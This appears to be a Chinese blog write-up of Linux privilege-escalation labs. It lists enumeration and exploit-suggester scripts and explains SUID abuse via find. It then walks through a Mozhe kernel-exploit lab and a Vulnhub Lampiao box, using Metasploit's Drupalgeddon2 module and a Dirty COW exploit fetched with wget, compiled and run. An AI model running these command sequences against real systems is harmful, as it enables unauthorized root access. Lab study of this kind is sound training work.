Linux脏牛内核漏洞&SUID&信息收集

6d8567b01be13a120a290db1075985bf

linux提权自动化脚本利用-4个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
信息收集:
LinEnum
https://github.com/rebootuser/LinEnum
https://blog.1997sty.com/cos/uploads/20220511/18da4eb277be073ce41ea2ad9dd8dde0.zip   --->  LinEnum-master.zip

linuxprivchecker
https://github.com/sleventyeleven/linuxprivchecker
https://blog.1997sty.com/cos/uploads/20220511/e77ae6dc869fe7f05fc67e05e5dda314.zip   --->  linuxprivchecker-master.zip



两个漏洞探针
linux-exploit-suggester
https://github.com/mzet-/linux-exploit-suggester
https://blog.1997sty.com/cos/uploads/20220511/72460d75214f2131918a6a33ee64b4da.zip    --->  linux-exploit-suggester-master.zip

linux-exploit-suggester2
https://github.com/jondonas/linux-exploit-suggester-2
https://blog.1997sty.com/cos/uploads/20220511/4cf5b371e0bb4bf08e9ac50d08b5f45b.zip    --->  linux-exploit-suggester-2-master.zip

LinEnum——Linux枚举及权限提升检查工具

1
2
3
4
#脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的)
cd /tmp
chmod +x LinEnum.sh
./LinEnum.sh

Snipaste_2023-07-31_11-38-28

主要检测以下几个大类的信息

  • 内核和发行版发布详情
  • 系统信息
  • 用户信息
  • 特权访问
  • 环境
  • 作业/任务
  • 服务
  • 一些web服务的版本信息
  • 默认/弱凭证
  • 搜索
  • 平台/软件特定测试

Linuxprivchecker——Linux 权限提升检查脚本

1
2
python linuxprivchecker.py
python linuxprivchecker.py -w -o linuxprivchecker.log

Snipaste_2023-07-31_11-41-57

linux-exploit-suggester——Linux 提权审计工具

1
2
3
4
#脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的)
cd /tmp
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Snipaste_2023-07-31_11-34-46

linux-exploit-suggester-2

1
perl linux-exploit-suggester-2.pl

Snipaste_2023-07-31_11-31-27

linux提权suid配合脚本演示

本来是普通用户执行普通程序,但是一旦给了程序suid权限,程序在运行中就会以root 权限执行,从而提升权限

  • test.sh原来的权限是-rwxr-xr-x,当执行chmod u+s test.sh命令后,它的权限就会变成-rwsr-xr-x.即使你用普通用户身份运行test.sh文件,实际上它却是以root权限运行的
  • SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了
  • https://pentestlab.blog/2017/09/25/suid-executables/

已知的可用来提权的程序如下

  1. nmap
  2. vim
  3. find
  4. bash
  5. more
  6. less
  7. nano
  8. cp

检测命令:

1
2
3
4
#可以使用`LinEnum.sh`进行搜索,也可以用命令进行查找
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Snipaste_2023-07-31_11-39-08

  • 执行以下命令,确认以root身份运行。即 当我们使用find pentestlab -exec <命令> \;的形式运行命令时,使用的是root身份
1
2
touch pentestlab
find pentestlab -exec whoami \;

这里我是没有成功的

linux提权本地配合内核漏洞演示-Mozhe

上传漏洞探针linux-exploit-suggester2并执行

Snipaste_2023-07-31_12-22-18

Snipaste_2023-07-31_13-22-50

Snipaste_2023-07-31_13-35-56

1
2
3
4
5
6
7
8
#首先kali连接上去:
ssh -p 49803 hack@219.153.49.228

#上传文件    ——https://github.com/Jewel591/Privilege-Escalation
gcc 45010.c -o 45010
chmod +x 45010
./45010
id

linux提权脏牛内核漏洞演示-Vulnhub

1
2
3
https://www.vulnhub.com/entry/lampiao-1,249/
#扫描当前网段
nmap  ip网段

Snipaste_2023-07-31_14-09-27

Snipaste_2023-07-31_14-11-11

扫到了这里开启了一台:192.168.70.137的主机

这里显示开启了80号端口,但是我去访问的时候,是没有的,可能是有防火墙,也有可能是误报,所以这里我在用masscan进行一次端口扫描,主要是nmap扫描太慢了

Snipaste_2023-07-31_14-11-40

我用火狐渗透版的访问这个80端口打不开,但是用谷歌浏览器就可以打开,不知道什么原因

Snipaste_2023-07-31_14-16-49

这次的nmap居然很快!!!

Snipaste_2023-07-31_14-17-59

发现新的端口1898

Snipaste_2023-07-31_14-18-58

Snipaste_2023-07-31_14-22-01

1
2
3
4
5
6
7
8
9
search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 192.168.70.137
set rport 1898
run


#正常这里来说,肯定是一个一个的去试的,或者在网上找到的利用方法一个一个的去试

Snipaste_2023-07-31_14-23-18

拿下:

Snipaste_2023-07-31_14-24-52

Snipaste_2023-07-31_14-47-28

尝试利用漏洞

1
2
3
4
5
wget https://www.exploit-db.com/download/40847
mv 40847 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow -s

Snipaste_2023-07-31_14-53-11

Snipaste_2023-07-31_14-53-17